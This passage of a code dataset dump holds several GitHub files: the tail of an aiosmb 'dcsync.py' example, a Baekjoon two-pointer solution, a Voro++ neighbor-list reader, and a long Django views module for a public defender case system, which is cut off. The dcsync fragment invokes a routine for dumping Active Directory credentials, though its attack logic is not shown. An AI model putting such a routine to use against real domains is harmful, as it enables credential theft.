Can be stacked.')\n\t\n\targs = parser.parse_args()\t\n\t\n\tif args.verbose == 0:\n\t\tlogging.basicConfig(level=logging.INFO)\n\t\taiosmb.logger.setLevel(logging.WARNING)\n\t\t\n\telif args.verbose == 1:\n\t\tlogging.basicConfig(level=logging.DEBUG)\n\t\taiosmb.logger.setLevel(logging.INFO)\n\t\t\n\telse:\n\t\tlogging.basicConfig(level=1)\n\t\taiosmb.logger.setLevel(logging.DEBUG)\n\t\n\tasyncio.run(dcsync(args.connection_string, args.out_file, args.domain, args.user, json_out = args.json))\n\t","repo_name":"xBlackSwan/aiosmb","sub_path":"aiosmb/examples/old_dontuse/dcsync.py","file_name":"dcsync.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"519115554","text":"import sys\n\n\ndef main() -> None:\n input_num = int(sys.stdin.readline().rstrip())\n input_list = list(map(int, sys.stdin.readline().rstrip().split(sep=' ')))\n sum_num = int(sys.stdin.readline().rstrip())\n\n start_index, end_index = 0, input_num - 1\n output_num = 0\n\n input_list.sort()\n\n while start_index < end_index:\n if input_list[start_index] + input_list[end_index] == sum_num:\n output_num += 1\n start_index += 1\n end_index -= 1\n elif input_list[start_index] + input_list[end_index] > sum_num:\n end_index -= 1\n else:\n start_index += 1\n\n print(output_num)\n\n return\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"junhyuk1229/baekjoon-python","sub_path":"Problem solutions/3273.py","file_name":"3273.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2896763579","text":"#!/usr/bin/python\n# coding = utf-8\n#This module is part of an analysis package\n\nAuthorinfo = \"\"\"\n ------------------Name: Yuan-Chao Hu--------------\n --------------Email: ychu0213@gmail.com-----------\n ----------Web: https://yuanchaohu.github.io/------\n \"\"\"\n\nDocstr = \"\"\"\n Reading particles' Neighbor list and Voronoi polyhedron facearea \n from the output of Voro++ Package analysis\n\n Voronoi tessellation can be carried out using the provided script 'Voronoi.sh'\n Voropp() is suitable for both data\n\n \"\"\"\n\nimport numpy as np \n\ndef Voropp(f, ParticleNumber):\n \"\"\"\n Read Neighbor list data from the results of Voro++ Package\n &&&&&&&&&\n Read facearea list data from the results of Voro++ Package\n\n Read one snapshot at a time to save computer memory\n If you have multiple snapshots, you can import this function in a loop\n f = open(filename, 'r')\n The Voronoi analysis can be carried out using the provided shell script 'voronoi.sh'\n \"\"\"\n\n header = f.readline().split() #header\n results = np.zeros((ParticleNumber, 50))\n\n for n in range(ParticleNumber):\n item = f.readline().split()\n results[int(item[0]) - 1, 0] = float(item[1])\n results[int(item[0]) - 1, 1:(int(item[1]) + 1)] = [float(j) - 1 for j in item[2:(int(item[1]) + 2)]]\n #Pay attention to the '-1' after '=', all particle ids have been reduced by 1\n #Please be careful when you are reading other data, like face area\n #you should first transform the data back before computation in other codes\n\n if 'neighborlist' in header: #neighbor list should be integer\n results = results.astype(int) #plain int: the np.int alias was removed in NumPy 1.24\n \n return 
results","repo_name":"yuanchaohu/analysiscodes","sub_path":"HuPackage.Version3/codes/ParticleNeighbors.py","file_name":"ParticleNeighbors.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"20687013956","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom __future__ import absolute_import, division, print_function, unicode_literals # isort:skip\r\n\r\n# Biblioteca Padrao\r\nimport calendar\r\nimport json as simplejson\r\nimport logging\r\nimport math\r\nimport mimetypes\r\nfrom datetime import date, datetime, time, timedelta\r\n\r\n# Bibliotecas de terceiros\r\nimport re\r\nimport reversion\r\n\r\nfrom constance import config\r\nfrom core.context_processors import permissao_acesso_propacs\r\nfrom dateutil.relativedelta import relativedelta\r\nfrom django.conf import settings\r\nfrom django.contrib import messages\r\nfrom django.contrib.auth.decorators import login_required, permission_required\r\nfrom django.contrib.auth.models import User\r\nfrom django.core.cache import cache\r\nfrom django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist\r\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\r\nfrom django.db import connection, transaction\r\nfrom django.db.models import Count, Sum, Case, When, Value, IntegerField, F, Q, BooleanField, Prefetch, OuterRef, Subquery, Exists\r\nfrom django.http import Http404, HttpResponseRedirect, JsonResponse, FileResponse\r\nfrom django.shortcuts import redirect, render, get_object_or_404\r\nfrom django.urls import reverse\r\nfrom django.utils import timezone\r\nfrom django.utils.decorators import method_decorator\r\nfrom django.views.decorators.cache import never_cache\r\nfrom django.views.generic import CreateView, ListView, TemplateView, View\r\nfrom djdocuments_solar_backend.backend import SolarDefensoriaBackend\r\nfrom djdocuments.models import Documento as DocumentoGED\r\nfrom djdocuments.views.documentos import VincularDocumentoBaseView, DocumentoCriar\r\nfrom rest_framework import mixins, permissions\r\nfrom rest_framework_extensions.mixins import DetailSerializerMixin\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.viewsets import GenericViewSet, ModelViewSet\r\n\r\n\r\n# Solar\r\nfrom assistido.models import PessoaAssistida as Pessoa, Documento as DocumentoAssistido\r\nfrom atendimento.atendimento.usecases import download_documentos\r\nfrom atendimento.atendimento.models import TipoVulnerabilidade, AtendimentoVulnerabilidade\r\nfrom atendimento.atendimento.permissions import PERMISSAO_PARA_ARQUIVAR, PERMISSAO_PARA_DESARQUIVAR\r\nfrom evento.models import Evento\r\nfrom contrib import constantes\r\nfrom contrib.models import Bairro, Comarca, Dados, Documento, Servidor, Util, Defensoria, Telefone\r\nfrom contrib.services import envia_sms\r\nfrom core.models import (\r\n Classe as CoreClasse,\r\n Documento as CoreDocumento,\r\n TipoDocumento as CoreTipoDocumento,\r\n TipoEvento as CoreTipoEvento\r\n)\r\nfrom defensor.models import Atuacao, Defensor\r\nfrom evento.models import Categoria\r\nfrom indeferimento.models import Indeferimento\r\nfrom luna_chatbot_client.tasks import (\r\n chatbot_notificar_requerente_atendimento,\r\n chatbot_notificar_requerente_documento,\r\n chatbot_notificar_requerente_exclusao,\r\n)\r\nfrom nucleo.nucleo.models import Formulario as FormularioNucleo\r\nfrom nucleo.nucleo.models import Resposta as RespostaNucleo\r\nfrom nucleo.nucleo.models import 
Nucleo\r\nfrom nucleo.nadep.models import Prisao, Atendimento as AtendimentoPreso\r\nfrom nucleo.nadep.services import Preso as ServicesPreso\r\nfrom procapi_client.services import APIAviso\r\nfrom processo.processo.forms import ProcessoForm, ProcessoParteForm\r\nfrom processo.processo.models import Manifestacao, ManifestacaoDocumento, Parte as ParteProcesso, Processo\r\nfrom processo.processo.models import Audiencia\r\nfrom relatorios.models import Local, Relatorio\r\n# Modulos locais\r\nfrom .forms import (\r\n AnotacaoForm,\r\n AtendimentoDefensorForm,\r\n AtividadeForm,\r\n AtividadeDefensorForm,\r\n BuscarAtendimentoDocumentosForm,\r\n BuscarAtendimentoForm,\r\n BuscarTarefaForm,\r\n DistribuirAtendimentoForm,\r\n DocumentoForm,\r\n TabDocumentoForm,\r\n DocumentoRespostaForm,\r\n AgendarDocumentoForm,\r\n NotificacaoForm,\r\n NucleoPedidoForm,\r\n NucleoRespostaForm,\r\n TarefaForm,\r\n CriarDocumentoOnlineParaAtendimentoForm,\r\n CriarDocumentoOnlineParaAtendimentoViaModeloPublicoForm,\r\n)\r\nfrom .models import (\r\n Acesso,\r\n Acordo,\r\n Arvore,\r\n Assunto,\r\n Atendimento,\r\n AtendimentoParticipante,\r\n AtendimentoVisualizacao,\r\n Coletivo,\r\n Documento as DocumentoAtendimento,\r\n Cronometro,\r\n Defensor as AtendimentoDefensor,\r\n Documento as AtendimentoDocumento,\r\n MotivoExclusao,\r\n Pessoa as AtendimentoPessoa,\r\n Tarefa,\r\n TarefaVisualizacao,\r\n FormaAtendimento,\r\n PastaDocumento)\r\nfrom .serializers import DocumentoAtendimentoSerializer, PastaDocumentoSerializer\r\nfrom .services import (\r\n AtendimentoService,\r\n ServiceDocumentoAtendimento,\r\n arquivamento_esta_habilitado,\r\n atualiza_tarefa_atendimento_origem,\r\n envia_sms_exclusao,\r\n envia_email_exclusao,\r\n preencher_campos_ged,\r\n filtra_tarefas,\r\n swap_ordenacao_tarefas,\r\n get_tarefas_propac,\r\n criar_documento_ged_para_o_atendimento,\r\n consulta_status_arquivado,\r\n checar_possibilidade_retorno\r\n)\r\nfrom .tasks import atendimento_cria_arvore\r\nfrom .view_mixins import SingleAtendimentoDefensorObjectMixin\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\n@never_cache\r\n@login_required\r\n@permission_required('atendimento.change_atendimento')\r\ndef atender(request, atendimento_numero):\r\n \"\"\"Utilizado para carregar a página Ficha de Atendimento\"\"\"\r\n\r\n servidor = request.user.servidor\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n defensor = request.user.servidor.defensor\r\n else:\r\n defensor = None\r\n\r\n try:\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero, ativo=True)\r\n except Exception:\r\n messages.error(request, u'O atendimento {} não existe!'.format(\r\n atendimento_numero\r\n ))\r\n return redirect('atendimento_index')\r\n\r\n # Se foi remarcado, redireciona para novo atendimento\r\n if atendimento.remarcado:\r\n messages.warning(request, u'O atendimento foi remarcado, seu novo número é {}'.format(\r\n atendimento.remarcado.numero\r\n ))\r\n return redirect('atendimento_atender', atendimento.remarcado.numero)\r\n\r\n # Se tipo processo e tem inicial, redireciona para atendimenot inicial\r\n if atendimento.tipo == Atendimento.TIPO_PROCESSO and atendimento.inicial and atendimento.inicial.ativo:\r\n return redirect('atendimento_atender', atendimento.inicial.numero)\r\n\r\n hoje = date.today()\r\n dia_um = datetime(hoje.year, hoje.month, 1)\r\n pode_ver_historico_do_atendimento = (atendimento.pode_ver_atendimento(request.user) and\r\n atendimento.pode_ver_detalhes_do_atendimento(request.user) and\r\n 
verifica_permissao_editar(request.user, atendimento))\r\n\r\n # Registrar primeira vez que um usuário acessar a página de atendimento a cada dia (se não for superusuário)\r\n if config.REGISTRAR_VISUALIZACAO_ATENDIMENTO_SUPERUSUARIO or not request.user.is_superuser:\r\n\r\n visualizou_hoje = AtendimentoVisualizacao.objects.filter(\r\n atendimento=atendimento.at_inicial,\r\n visualizado_por=request.user,\r\n visualizado_em__gte=hoje\r\n ).exists()\r\n\r\n if not visualizou_hoje:\r\n AtendimentoVisualizacao.objects.create(\r\n atendimento=atendimento.at_inicial,\r\n evento=atendimento,\r\n visualizado_por=request.user\r\n )\r\n\r\n form = AtendimentoDefensorForm(instance=atendimento)\r\n form_processo = ProcessoForm()\r\n form_processo_parte = ProcessoParteForm(prefix='parte')\r\n\r\n tab = request.GET.get('tab', None) # seta a Tab ativa\r\n\r\n # altera qualificacao se solicitado para este atendimento e não realizado ou realizado no mês corrente\r\n if request.session.get('qualificacao_id') \\\r\n and atendimento.id == request.session.get('atendimento_id') \\\r\n and (request.user.has_perm('atendimento.requalificar_atendimento_retroativo') or (\r\n atendimento.data_atendimento is None or\r\n atendimento.data_atendimento >= dia_um)\r\n ):\r\n\r\n # recupera e aplica qualificacao da sessao\r\n atendimento.qualificacao_id = request.session['qualificacao_id']\r\n atendimento.save()\r\n\r\n # remove qualificacao da sessao\r\n request.session['qualificacao_id'] = None\r\n request.session['atendimento_id'] = None\r\n\r\n if request.session.get('nucleo'):\r\n ativo = request.session.get('nucleo') == atendimento.nucleo\r\n else:\r\n ativo = (atendimento.nucleo is None)\r\n\r\n prisoes = None\r\n preso = None\r\n\r\n if atendimento.requerente:\r\n prisoes = Prisao.objects.filter(pessoa=atendimento.requerente.pessoa, ativo=True).order_by('-data_prisao')\r\n preso = ServicesPreso(atendimento.requerente.pessoa)\r\n\r\n if prisoes:\r\n\r\n nadep = AtendimentoPreso.objects.filter(id=atendimento.id).first()\r\n\r\n if not atendimento.tipo == atendimento.TIPO_PROCESSO and not atendimento.realizado or atendimento.agendado_hoje:\r\n\r\n if request.GET.get('pessoa_id'):\r\n\r\n interessado = Pessoa.objects.filter(id=request.GET.get('pessoa_id')).first()\r\n\r\n if interessado:\r\n\r\n if not atendimento.pessoas.filter(pessoa=interessado).exists():\r\n atendimento.add_requerente(interessado.id)\r\n\r\n nadep = AtendimentoPreso()\r\n nadep.__dict__.update(atendimento.__dict__)\r\n nadep.interessado = interessado\r\n nadep.save()\r\n\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n permissao_editar = verifica_permissao_editar(request.user, atendimento)\r\n\r\n # Só gera um cronômetro para calcular tempo de atendimento se pessoa tem permissão para atender\r\n if permissao_editar:\r\n\r\n try:\r\n cronometro, msg = Cronometro.objects.get_or_create(\r\n atendimento=atendimento,\r\n servidor=servidor,\r\n finalizado=False\r\n )\r\n except MultipleObjectsReturned:\r\n cronometro = Cronometro.objects.filter(\r\n atendimento=atendimento,\r\n servidor=servidor,\r\n finalizado=False\r\n ).first()\r\n\r\n cronometro.atualizar()\r\n\r\n acesso_solicitado = atendimento.acesso_solicitado(defensor)\r\n acesso_concedido = atendimento.acesso_concedido(defensor)\r\n propacs_acesso = permissao_acesso_propacs(request)\r\n\r\n if defensor:\r\n\r\n # Atuacoes vigentes para o dia\r\n atuacoes = Atuacao.objects.vigentes_por_defensor(defensor=defensor)\r\n\r\n if request.session.get('nucleo'):\r\n 
atuacoes = atuacoes.filter(defensoria__nucleo=request.session.get('nucleo'))\r\n\r\n request.session['atendimento_id'] = atendimento.id\r\n\r\n relatorios_dados = Relatorio.objects.filter(\r\n papeis=request.user.servidor.papel,\r\n locais__pagina=Local.PAG_ATENDIMENTO_ATENDER\r\n ).ativos()\r\n\r\n relatorios_btn_requerente = Relatorio.objects.filter(\r\n papeis=request.user.servidor.papel,\r\n locais__pagina=Local.PAG_ATENDIMENTO_ATENDER_BTN_REQUERENTE\r\n ).ativos()\r\n\r\n relatorios_btn_requerido = Relatorio.objects.filter(\r\n papeis=request.user.servidor.papel,\r\n locais__pagina=Local.PAG_ATENDIMENTO_ATENDER_BTN_REQUERIDO\r\n ).ativos()\r\n\r\n angular_app = 'atenderApp'\r\n angular = 'AtendimentoCtrl'\r\n\r\n return render(request=request, template_name=\"atendimento/atender.html\", context=locals())\r\n\r\n\r\n@never_cache\r\n@login_required\r\n@permission_required('atendimento.change_atendimento')\r\ndef ocultar(request, atendimento_numero, defensoria):\r\n\r\n try:\r\n AtendimentoDefensor.objects.filter(\r\n numero=atendimento_numero,\r\n ativo=True\r\n ).update(\r\n exibir_no_painel_de_acompanhamento=False\r\n )\r\n except Exception:\r\n messages.error(request, u'Não foi possível ocultar o atendimento {}!'.format(\r\n atendimento_numero\r\n ))\r\n return redirect('atendimento_index')\r\n\r\n return redirect(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n defensoria_id=defensoria,\r\n painel='sem-peca-juridica'\r\n )\r\n\r\n\r\n@login_required\r\ndef atender_tab_atividades(request, atendimento_numero):\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n defensoria__nucleo__apoio_pode_registrar_atividades=True,\r\n remarcado=None,\r\n ativo=True)\r\n\r\n # Atuações vigentes de defensores na defensoria do atendimento\r\n atuacoes = atendimento.defensoria.all_atuacoes.vigentes()\r\n participantes_exists = False\r\n permissao = False\r\n\r\n # Verifica se existem participantes de acordo com o tipo de núcleo\r\n if atendimento.defensoria.nucleo.multidisciplinar:\r\n participantes_exists = atendimento.participantes.exists()\r\n permissao = request.user.is_superuser or \\\r\n atendimento.participantes.filter(usuario=request.user).exists() or \\\r\n request.user.has_perm(perm='nucleo.admin_multidisciplinar')\r\n else:\r\n participantes_exists = atuacoes.exists()\r\n permissao = request.user.is_superuser or \\\r\n atuacoes.filter(defensor=request.user.servidor.defensor).exists()\r\n\r\n atendimento_realizado = atendimento.realizado\r\n\r\n hoje = datetime.now()\r\n diaMin = datetime(hoje.year, hoje.month, 1)\r\n diaMax = datetime(hoje.year, hoje.month, calendar.monthrange(hoje.year, hoje.month)[1])\r\n\r\n pedido = atendimento.origem\r\n\r\n atividades = atendimento.filhos.select_related(\r\n 'qualificacao'\r\n ).prefetch_related(\r\n 'documento_set',\r\n 'participantes_atendimentos'\r\n ).filter(\r\n origem=atendimento,\r\n ativo=True,\r\n tipo=Atendimento.TIPO_ATIVIDADE\r\n ).order_by(\r\n 'data_atendimento'\r\n )\r\n\r\n documentos = AtendimentoDocumento.objects.filter(\r\n atendimento__origem=atendimento,\r\n ativo=True\r\n ).order_by('documento_online__esta_assinado', 'nome')\r\n\r\n form = DocumentoForm()\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_atividades.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef atender_tab_documentos(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n ativo=True,\r\n 
remarcado=None\r\n )\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n defensor = request.user.servidor.defensor\r\n else:\r\n defensor = None\r\n\r\n atendimento_para_upload = atendimento\r\n atendimento_permissao = False\r\n acesso_concedido = False\r\n pode_cadastrar_peticionamento = False\r\n pode_visualizar_aba = True\r\n abas_atendimento_restritas = config.ATIVAR_SIGILO_ABAS_ATENDIMENTO.title().replace(\" \", \"\").split(',')\r\n\r\n # Checks whether this is a support request (i.e. whether it has a TIPO_NUCLEO child)\r\n atendimento_para_apoio = atendimento.filhos.filter(\r\n tipo=Atendimento.TIPO_NUCLEO,\r\n ativo=True\r\n ).exists()\r\n\r\n # If it is a support request, look for the last valid atendimento (one that is not a support request)\r\n if atendimento_para_apoio:\r\n\r\n atendimento_para_upload = AtendimentoDefensor.objects.filter(\r\n (\r\n Q(id=atendimento.inicial_id) |\r\n Q(inicial=atendimento.inicial_id)\r\n ) &\r\n (\r\n (\r\n Q(tipo__in=[\r\n Atendimento.TIPO_INICIAL,\r\n Atendimento.TIPO_RETORNO,\r\n Atendimento.TIPO_INTERESSADO,\r\n Atendimento.TIPO_VISITA]) & ~\r\n Q(data_atendimento=None)\r\n ) |\r\n Q(tipo=Atendimento.TIPO_PROCESSO)\r\n ) &\r\n Q(ativo=True)\r\n ).exclude(\r\n filhos__tipo=Atendimento.TIPO_NUCLEO\r\n ).order_by(\r\n '-data_atendimento'\r\n ).first()\r\n\r\n if atendimento_para_upload is None:\r\n raise Http404\r\n\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n acesso_concedido = atendimento.acesso_concedido(defensor)\r\n\r\n try:\r\n if abas_atendimento_restritas[0] == 'True' and not atendimento_permissao and not acesso_concedido:\r\n pode_visualizar_aba = False\r\n except IndexError:\r\n pode_visualizar_aba = True\r\n\r\n # Checks whether the user is assigned to any defensoria with the petitioning feature enabled\r\n pode_cadastrar_peticionamento = defensor.atuacoes().vigentes().filter(\r\n defensoria__pode_cadastrar_peticionamento=True\r\n ).exists()\r\n\r\n pode_peticionar_documento_nao_ged = False\r\n if atendimento.defensoria.nucleo is not None:\r\n pode_peticionar_documento_nao_ged = atendimento.defensoria.nucleo.acordo\r\n\r\n form_documento = DocumentoForm()\r\n form_peticao_simples = TabDocumentoForm(request.GET, usuario=request.user)\r\n\r\n '''\r\n WARNING!!!\r\n Never use 'atendimento' in the file-upload context, since the validation above may swap the atendimento\r\n being used. This is necessary because the user may have the support request open, which would send the\r\n document to the requested sector, while the atendimento in question is still needed for other handling\r\n '''\r\n\r\n return render(\r\n request=request,\r\n template_name=\"atendimento/atender_tab_documentos.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n 'atendimento_para_upload': atendimento_para_upload,\r\n 'atendimento_permissao': atendimento_permissao,\r\n 'pode_visualizar_aba': pode_visualizar_aba,\r\n 'acesso_concedido': acesso_concedido,\r\n 'pode_cadastrar_peticionamento': pode_cadastrar_peticionamento,\r\n 'pode_peticionar_documento_nao_ged': pode_peticionar_documento_nao_ged,\r\n 'form_documento': form_documento,\r\n 'form_peticao_simples': form_peticao_simples,\r\n 'config': config\r\n }\r\n )\r\n\r\n\r\ndef download_documentos_anexos(request, atendimento_numero):\r\n requisicao_payload = simplejson.loads(request.body)\r\n\r\n prefixo_arquivo = requisicao_payload.get(\"prefixo_arquivo\", \"documentos_solicitados\")\r\n tipo_documentos = requisicao_payload.get(\"tipo_documentos\")\r\n arquivos_solicitados = requisicao_payload.get(\"arquivos_solicitados\")\r\n\r\n arquivo_path = download_documentos(arquivos_solicitados, prefixo_arquivo,\r\n atendimento_numero, tipo_documentos)\r\n\r\n return FileResponse(open(arquivo_path, \"rb\"), as_attachment=True)\r\n\r\n\r\n@login_required\r\ndef atender_tab_tarefas(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n remarcado=None,\r\n ativo=True)\r\n\r\n defensor = None\r\n if hasattr(request.user.servidor, 'defensor'):\r\n defensor = request.user.servidor.defensor\r\n\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n acesso_concedido = atendimento.acesso_concedido(defensor)\r\n abas_atendimento_restritas = config.ATIVAR_SIGILO_ABAS_ATENDIMENTO.title().replace(\" \", \"\").split(',')\r\n\r\n pode_visualizar_aba = True\r\n try:\r\n if abas_atendimento_restritas[1] == 'True' and not atendimento_permissao and not acesso_concedido:\r\n pode_visualizar_aba = False\r\n except IndexError:\r\n pode_visualizar_aba = True\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_tarefas.html\", context=locals())\r\n\r\n\r\ndef get_defensorias_usuario(usuario):\r\n\r\n defensorias = Defensoria.objects.none()\r\n\r\n if hasattr(usuario.servidor, 'defensor'):\r\n\r\n agora = datetime.now()\r\n\r\n # TODO: use the Defensor.atuacoes_vigentes() method, with support for itinerant events\r\n defensorias = Defensoria.objects.filter(\r\n (\r\n (\r\n Q(all_atuacoes__defensor=usuario.servidor.defensor)\r\n ) &\r\n (\r\n (\r\n Q(all_atuacoes__data_inicial__lte=agora) &\r\n Q(all_atuacoes__data_final__gte=agora)\r\n ) |\r\n (\r\n Q(all_atuacoes__data_inicial__lte=agora) &\r\n Q(all_atuacoes__data_final=None)\r\n )\r\n ) & Q(all_atuacoes__ativo=True)\r\n ) |\r\n (\r\n Q(evento__participantes=usuario.servidor) &\r\n Q(evento__data_inicial__lte=agora) &\r\n Q(evento__data_final__gte=agora - timedelta(days=agora.day)) &\r\n Q(evento__ativo=True)\r\n )\r\n ).distinct()\r\n\r\n return defensorias\r\n\r\n\r\n# todo: move to an appropriate location\r\ndef verifica_permissao_editar(usuario, atendimento):\r\n\r\n tem_permissao = False\r\n\r\n if usuario.is_superuser:\r\n tem_permissao = True\r\n else:\r\n tem_permissao = get_defensorias_usuario(usuario).filter(id=atendimento.defensoria_id).exists()\r\n\r\n return 
tem_permissao\r\n\r\n\r\n@login_required\r\ndef atender_tab_historico(request, atendimento_numero):\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n defensor = request.user.servidor.defensor\r\n else:\r\n defensor = None\r\n\r\n atendimento = AtendimentoDefensor.objects.filter(numero=atendimento_numero, ativo=True, remarcado=None).first()\r\n pode_efetuar_retorno = checar_possibilidade_retorno(atendimento)\r\n\r\n inicio = date.today()\r\n termino = datetime.combine(inicio, time.max)\r\n\r\n if atendimento:\r\n\r\n nadep = AtendimentoPreso.objects.filter(id=atendimento.id).first()\r\n\r\n if atendimento.requerente:\r\n prisoes = Prisao.objects.filter(pessoa=atendimento.requerente.pessoa, ativo=True).order_by('-data_prisao')\r\n preso = ServicesPreso(atendimento.requerente.pessoa)\r\n\r\n # determines which date will be used as the reference for carrying out the atendimento (default: today)\r\n data_referencia = inicio\r\n\r\n # if already carried out, use the atendimento date as the reference date\r\n if atendimento.data_atendimento:\r\n data_referencia = atendimento.data_atendimento\r\n # otherwise, if it can be carried out retroactively, use the scheduling date as the reference date\r\n elif (\r\n atendimento.tipo != Atendimento.TIPO_NUCLEO and\r\n atendimento.data_agendamento is not None and\r\n atendimento.data_agendamento.date() < date.today() and\r\n atendimento.pode_atender_retroativo(request.user)\r\n ):\r\n data_referencia = atendimento.data_agendamento\r\n\r\n q = Q(ativo=True)\r\n q &= Q(atendimento=atendimento.at_inicial)\r\n q &= ~Q(documento_online=None)\r\n documentos = AtendimentoDocumento.objects.filter(q).order_by('-documento_online__esta_assinado', 'nome')\r\n\r\n form = AtendimentoDefensorForm(instance=atendimento)\r\n\r\n permissao_acessar = atendimento.permissao_acessar(usuario=request.user)\r\n permissao_editar = verifica_permissao_editar(request.user, atendimento)\r\n\r\n if defensor:\r\n\r\n acesso_solicitado = atendimento.acesso_solicitado(defensor)\r\n acesso_concedido = atendimento.acesso_concedido(defensor)\r\n form_nucleo = NucleoPedidoForm()\r\n\r\n defensorias = get_defensorias_usuario(request.user)\r\n defensorias_titular = defensorias.filter(\r\n Q(all_atuacoes__tipo__in=[Atuacao.TIPO_TITULARIDADE, Atuacao.TIPO_ACUMULACAO])\r\n )\r\n\r\n esta_lotado_classe_especial = defensorias.filter(grau=Defensoria.GRAU_2).exists()\r\n possui_processo_2grau = atendimento.at_inicial.get_processos().filter(\r\n parte__defensoria__grau=Defensoria.GRAU_2\r\n ).exists()\r\n\r\n razoes_indeferimento = CoreClasse.objects.processo_indeferimento().ativos()\r\n setores_encaminhamento_indeferimento = Defensoria.objects.ativos().filter(\r\n nucleo__indeferimento_pode_receber_negacao=True\r\n )\r\n\r\n pessoas = list(atendimento.get_requerentes().values_list('pessoa_id', flat=True))\r\n\r\n # Atendimento denials (Indeferimentos) for the applicants in other atendimentos\r\n indeferimentos_requerentes = Indeferimento.objects.annotate(\r\n recursos=Sum(\r\n Case(\r\n When(processo__eventos__tipo__tipo=CoreTipoEvento.TIPO_RECURSO, then=1),\r\n output_field=IntegerField()\r\n ))\r\n ).filter(\r\n Q(processo__desativado_em=None) &\r\n Q(processo__classe__tipo=CoreClasse.TIPO_NEGACAO_HIPOSSUFICIENCIA) &\r\n Q(processo__partes__pessoa__in=pessoas) &\r\n Q(\r\n Q(recursos=0) |\r\n Q(resultado=Indeferimento.RESULTADO_INDEFERIDO)\r\n ) &\r\n ~Q(atendimento=atendimento)\r\n )\r\n\r\n # Fetch all Indeferimento records related to any atendimento in the atendimento tree\r\n inicial_id = None\r\n 
atendimentos_id = []\r\n\r\n if atendimento.inicial:\r\n inicial_id = atendimento.inicial.id\r\n else:\r\n inicial_id = atendimento.id\r\n\r\n atendimentos_id = Atendimento.objects.filter(\r\n Q(ativo=True) &\r\n (\r\n Q(id=inicial_id) |\r\n Q(inicial__id=inicial_id)\r\n )\r\n ).values_list('id', flat=True)\r\n\r\n indeferimentos = Indeferimento.objects.ativos().filter(atendimento_id__in=atendimentos_id)\r\n\r\n mostrar_exibicao_acesso_atendimento = False\r\n\r\n if config.MODO_EXIBICAO_ACESSO_ATENDIMENTO == '1' and atendimento.tipo == Atendimento.TIPO_INICIAL: # inicial\r\n mostrar_exibicao_acesso_atendimento = True\r\n elif config.MODO_EXIBICAO_ACESSO_ATENDIMENTO == '2': # todos\r\n mostrar_exibicao_acesso_atendimento = True\r\n\r\n pode_atender_sem_liberar = request.user.has_perm('atendimento.atender_sem_liberar')\r\n pode_atender_retroativo = atendimento.pode_atender_retroativo(request.user)\r\n pode_ver_atendimento = atendimento.pode_ver_atendimento(request.user)\r\n pode_ver_detalhes_do_atendimento = atendimento.pode_ver_detalhes_do_atendimento(request.user)\r\n\r\n possui_permissao_remeter_atendimento = request.user.has_perm(perm='atendimento.remeter_atendimento')\r\n exibir_vulnerabilidade_digital = config.EXIBIR_VULNERABILIDADE_DIGITAL\r\n possui_permissao_arquivar_atendimento = request.user.has_perm(perm=PERMISSAO_PARA_ARQUIVAR)\r\n possui_permissao_desarquivar_atendimento = request.user.has_perm(perm=PERMISSAO_PARA_DESARQUIVAR)\r\n\r\n mostrar_campos_interesse_conciliar = True if settings.SIGLA_UF == 'rn' else False\r\n mostrar_botao_encerrar = True if settings.SIGLA_UF == 'am' else False\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_historico.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef atender_tab_outros(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n remarcado=None,\r\n ativo=True)\r\n\r\n atendimento = atendimento.at_inicial # redireciona para atendimento inicial\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n abas_atendimento_restritas = config.ATIVAR_SIGILO_ABAS_ATENDIMENTO.title().replace(\" \", \"\").split(',')\r\n acesso_concedido = atendimento.acesso_concedido(request.user.servidor.defensor)\r\n pode_visualizar_aba = True\r\n\r\n try:\r\n if abas_atendimento_restritas[3] == 'True' and not atendimento_permissao and not acesso_concedido:\r\n pode_visualizar_aba = False\r\n except IndexError:\r\n pode_visualizar_aba = True\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_outros.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef atender_tab_processos(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n remarcado=None,\r\n ativo=True)\r\n\r\n bloqueado = False\r\n if not config.VINCULAR_PROCESSO_COM_ATENDIMENTO_EM_ANDAMENTO:\r\n bloqueado = atendimento.at_inicial.tipo != Atendimento.TIPO_PROCESSO and not atendimento.at_inicial.realizado\r\n\r\n hoje = date.today()\r\n diaMin = date(hoje.year, hoje.month, 1)\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n abas_atendimento_restritas = 